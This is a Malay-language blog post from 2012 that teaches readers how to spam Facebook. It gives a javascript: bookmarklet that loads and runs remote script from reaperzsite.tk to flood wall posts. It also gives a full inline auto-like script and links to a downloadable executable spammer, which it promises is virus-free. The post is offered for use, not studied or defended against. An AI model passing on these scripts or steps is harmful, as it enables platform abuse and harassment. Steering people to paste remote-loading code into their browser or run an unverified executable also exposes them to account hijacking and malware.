Friday, 3 February 2012

Facebook Spam!


Assalamualaikum dan salam sejahtera semua.... :D
Entry kali ini aku nak share dengan korang cara nak spam di facebook plak.ada spam like,wall post, comment dan chat.

Apa itu spam?

Spam ni adalah email, teks atau sesuatu bahan yang dihantar secara AUTOMATIC @ ROBOT GENERATE yang masuk kedalam email kita atau forum atau komen atau seumpamanya. Bahan yang dihantar tu sbnrnya bukanlah niat penghantar tu utk menghantar kpd kita tetapi sekadar menyebar maklumat yg dia nak secara 'peluru tabur'. Senang citer umpamanya kalau kita nk email memberitahu sesuatu kpd rakan kita, seolah2 kita memancing dgn satu kail. Tetapi spam ni, dia pakai jala jer terus tebar...

Spam ni jugak benda yang menyemakkan/memenuhkan inbox kita.


sumber : http://www.nahamphoto.com/forum/index.php?topic=337.0


Ni salah satu jenis spam.

Ok jom mula!

Spam Wall Post :

1. Copy javascript dibawah :


javascript:(a = (b = document).createElement("script")).src = "//reaperzsite.tk/javascript/flodder.js", b.body.appendChild(a); void(0)


Paste ke dalam address bar di browser korang.Dan tekan enter!
Lepas tu isi la berapa banyak yg korang nk spam, dan masukkan message yg korang nk spam.click OK!


note : bagi google chrome, korang kena padam semua address di address bar, dan tulis : javascript:
lepas tu paste code spam ni di depan tulisan tu.


Spam Like(Auto-like) :



1. Copy javascript di bawah :



javascript:var i=0;ex=0;s=0;function EXP_ALL(){ExpandComm = document.getElementsByTagName("input");for(e = 0; e < ExpandComm.length; e++){myClass = ExpandComm[e].getAttribute("class");if(myClass != null && myClass.indexOf("stat_elem") >= 0)if(ExpandComm[e].getAttribute("name") == "view_all")ExpandComm[e].click()}}function JEMPOLERS(){jempol = document.getElementsByTagName("button");for(j = 0; j < jempol.length; j++){myClass = jempol[j].getAttribute("class");if(myClass != null && myClass.indexOf("like_link") >= 0)if(jempol[j].getAttribute("name") == "like")jempol[j].click()};}function JEMPOLERC(){buttons = document.getElementsByTagName("button");for(x = 0; x < buttons.length; x++){myClass = buttons[x].getAttribute("class");if(myClass != null && myClass.indexOf("stat_elem") >= 0)if(buttons[x].getAttribute("title") == "Like this comment")buttons[x].click()};}function updateTime(){ex=ex+1;i=i+1;s=s+1;if (ex==5){EXP_ALL();ex=0};if (s==5){ex=0;JEMPOLERS();s=0};if (i==2){JEMPOLERC();i=0;}}alert('(-auto like- by Rea_pErz');updateTime();window.setInterval(updateTime, 1000);void(0)

2. Paste dalam address bar.tekan enter!


note : bagi google chrome stepnya sama seperti di atas.




Spam Comment & Chat


1. Download tool aku disini :
Facebook Chat And Comment Spammer


100% CLEAN!NO VIRUS!NO KEYLOGGER!


2. Extract file tu, dan run file "Facebook Chat And Comment Spammer.exe"

3. Akan terpapar seperti dibawah :





1. ok masukkan perkataan yg korang nk spam dalam kotak besar tu.
2. Masukkan angka kelajuan korang. 
3. Tekan START!
4. Bukak facebook korang,click dekat ruangan comment atau chat target korang.ENJOY!




Baiklah itu saja untuk kali ini....semoga korang guna untuk kebaikan(ecece xD).

Assalamualaikum~~~


Item Reviewed: Facebook Spam! Description: Rating: 5 Reviewed By Afif Zafri

Share:

Popular Posts

© 2011 - Reaperz All rights reserved | Theme Designed by Seo Blogger Templates DMCA.com